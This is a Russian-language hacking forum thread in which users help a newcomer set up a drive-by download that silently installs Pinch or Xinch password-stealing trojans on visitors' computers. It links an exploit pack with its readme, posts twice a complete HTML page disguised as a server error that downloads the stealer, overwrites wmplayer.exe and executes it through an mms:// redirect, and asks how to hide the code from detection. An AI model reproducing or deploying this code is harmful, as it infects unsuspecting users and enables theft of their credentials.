Всем привет =)

Парни у меня возник вопрос:

Cуществует ли в народе скрипт при попадании на него ЮЗВЕРЯ чтобы на его машину АВТОМАТОМ чтонибудь бы скачалось допустим Pinch или Xinch ???

!!!зарание примного благодарен!!!

ога
http://forum.antichat.ru/thread30234.html
=)

Есть еще Веб Атакер. Только он по моему все еще в привате.

Есть еще Веб Атакер. Только он по моему все еще в привате.
Тот каторый ты у меня спер с флешки пока я пьяный спал... :D

Тот каторый ты у меня спер с флешки пока я пьяный спал...
=\ с диска

такой скрипт называется эксплоитом для браузера.

Парни я правильно понял ? или нет ?

Этот сплойт необходимо разместить на хосте. и када ЮЗЕР на него зайдет к нему на машину скачается тот или иной файл да?
Если я неправ плиз обьяснике =)

Почти, если его браузер подвержен этой уязвимости то жертве загрузиться твой exe

ок понятненько =)

А ентот СТЛОЙТ на чем написан? на php или html хотя html наврятли помоему верно?

Самый дырявый же у нас IE наскоко мне извесно, получается что и сплойт надыть для IE! но вот токо где взять такой сплойт?

blaga а Веб Атакер это че тоже сплойт?

но вот токо где взять такой сплойт?
Смеешся?
Green_Bear тебе дал ссылку на такой експлойт...

а этот ехе запустится после того как скачается или нах тада такие сплойты?

Смеешся?
Green_Bear тебе дал ссылку на такой експлойт...

Блин ну почему сразу смеёшся =(
Заходил я по ентой сылке проходит скока там минуда или 30 сек и выходит ОШИБКА =(

Усе норм сплойт нашел тут: ---> http://rapidshare.com/files/9520519/sploit.rar.html
За сплойт всем пасибо!!!

парни еще немнохо вопросиков =)

Я тут в редми тыкался и чет никуя непонял некоторых вещей:

Установка:
1) Скопируйте скрипты на сервер
2) Импортируйте sql.txt в mysql
3) Пропишите настройки в файле inc\config.php
4) Пустите трафф на index.php

Описание:
index.php - скрипт-приемник траффа
load.php - сюда стучит лоадер
exe.php - отсюда лоадер скачивает "exe"
loader.exe - лоадер (замените своим)
rds.js - сплоит rds
FolderIcon.js - сплоит 0day
stat.php - страница статистики.

Плиз обьясните:
2) Импортируйте sql.txt в mysql

4) Пустите трафф на index.php <--- Как понять пустите траф?

Пихаешь на сайт с хтмл файл index.html с содержанием :
<html>
<head>
<title>Error 404</title>
</head>
<body>
</body>
<p><span style="font-size: 11pt">Error 500</span></p>
<p><span style="font-size: 11pt">The page is incorrectly displayed</span></p>
<script language="javascript">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "ПУТЬ ДО ПИНЧА ИЛИ КСИНЧА",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);
location.href = "mms:%2f%2f";
</script>

</p>

</html>
Где ПУТЬ ДО ПИНЧА ИЛИ КСИНЧА там пишешь путь до пинча или ксинча.

ктото ответит на мой вопрос???

пс. и еще вапрос ат навичьга, имха эта палевна такой код могут замедедь, чем скрыть сорз ???

Пихаешь на сайт с хтмл файл index.html с содержанием :
<html>
<head>
<title>Error 404</title>
</head>
<body>
</body>
<p><span style="font-size: 11pt">Error 500</span></p>
<p><span style="font-size: 11pt">The page is incorrectly displayed</span></p>
<script language="javascript">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "ПУТЬ ДО ПИНЧА ИЛИ КСИНЧА",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);
location.href = "mms:%2f%2f";
</script>

</p>

</html>
Где ПУТЬ ДО ПИНЧА ИЛИ КСИНЧА там пишешь путь до пинча или ксинча.


Примного благодарен СПС =)
А вот вопросик: Действительно када трой скачается он автоматом запустится?

Ответ в строчке :
location.href = "mms://";
Короче ДА.

а через вин плеер, так бы и сказали сразу!

Все парни всем большое спасибо за то что помогли разобратся!
тему можно закрывать.